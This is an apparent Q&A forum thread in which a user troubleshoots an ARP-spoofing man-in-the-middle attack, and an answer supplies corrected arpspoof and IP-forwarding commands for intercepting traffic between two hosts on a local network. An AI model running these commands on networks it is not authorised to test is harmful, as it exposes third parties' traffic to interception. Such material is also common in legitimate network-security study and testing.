0

I am attempting to perform a MITM attack via ARP spoofing to sniff out the traffic from 10.0.0.54 to 10.0.0.55. Here is my setup:

echo 1 > /proc/sys/net/ipv4/ip_forward
sudo arpspoof -i wlan0 -t 10.0.0.54 10.0.0.1
sudo arpspoof -i wlan0 -t 10.0.0.1 10.0.0.54

My knowledge is that this captures all traffic from 10.0.0.54. However, based on my analysis of tcpdump, I am only capturing external traffic (any public IP addresses) and not capturing any internal traffic (private IP addresses).

Can someone tell me why this would be the case? Should I send my ARP requests elsewhere?

Gavin Youker
  • 1,270
  • 1
  • 11
  • 23
  • 1
    Since you want to sniff data between .54 and .55, why are you spoofing 10.0.0.1 instead of 10.0.0.55 ? – Eibo Jul 24 '17 at 06:28
  • You can capture external traffic without arp poisoning. I can't understand the logic why are you spoofing 10.0.0.1? – Kerim Can Kalıpcıoğlu Jul 24 '17 at 07:16
  • @Emadeddin My though was sniffing the router (10.0.0.1) would allow me to receive all traffic from 10.0.0.54 on the network, including 10.0.0.55. Ate you saying my setup should look something like `sudo arpspoof -i wlan0 -t 10.0.0.54 10.0.0.55`? – Gavin Youker Jul 25 '17 at 03:24

1 Answers1

0

Since you want to capture data between two devices that exist on the same network range
'i.e. 10.0.0.0', you don't need to spoof the router.

Your Mitm attack should take place between the two devices because the data flows directly from one device to another when you're on the same network and doesn't go to the router (of course there are few exceptions).

So, you need to modify your commands to the following:

echo 1 > /proc/sys/net/ipv4/ip_forward
sudo arpspoof -i wlan0 -t 10.0.0.54 10.0.0.55
sudo arpspoof -i wlan0 -t 10.0.0.55 10.0.0.54

if you have further issues, please update your question.

Eibo
  • 2,485
  • 3
  • 19
  • 32